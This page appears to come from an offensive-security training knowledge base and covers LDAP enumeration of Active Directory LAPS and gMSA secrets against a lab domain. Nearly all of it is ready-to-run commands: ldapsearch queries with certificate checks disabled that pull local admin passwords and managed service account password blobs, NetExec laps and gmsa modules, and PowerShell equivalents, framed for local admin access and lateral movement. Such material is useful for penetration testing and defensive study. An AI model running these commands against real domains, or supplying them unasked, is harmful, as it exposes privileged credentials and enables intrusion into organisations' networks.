Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / LDAP / Enumeration

LAPS and GMSA

LAPS and gMSA secrets are exposed through LDAP attributes when the current principal has read rights. We query these attributes directly and then validate whether the recovered credential material enables local admin, service abuse, or lateral movement.

export DC=10.10.10.200
export BASE='DC=ootw,DC=local'
export DOMAIN=ootw.local
export USER='student'
export PASS='student'

Query legacy Microsoft LAPS passwords if the current principal has read rights.

LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(ms-Mcs-AdmPwd=*)' dNSHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime

Query Windows LAPS password blobs if the current principal has read rights.

LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msLAPS-Password=*)' dNSHostName msLAPS-Password msLAPS-PasswordExpirationTime

Find gMSA accounts and read managed password material if delegated.

LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=msDS-GroupManagedServiceAccount)' sAMAccountName distinguishedName msDS-GroupMSAMembership msDS-ManagedPassword

Use NetExec modules for LAPS and gMSA checks.

nxc ldap $DC -d OOTW -u $USER -p "$PASS" -M laps
nxc ldap $DC -d OOTW -u $USER -p "$PASS" -M gmsa

Windows-side equivalent.

Get-ADComputer -LDAPFilter '(ms-Mcs-AdmPwd=*)' -Properties 'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime',dNSHostName |
    Select-Object dNSHostName,'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime'

Get-ADServiceAccount -Filter * -Properties msDS-GroupMSAMembership,msDS-ManagedPassword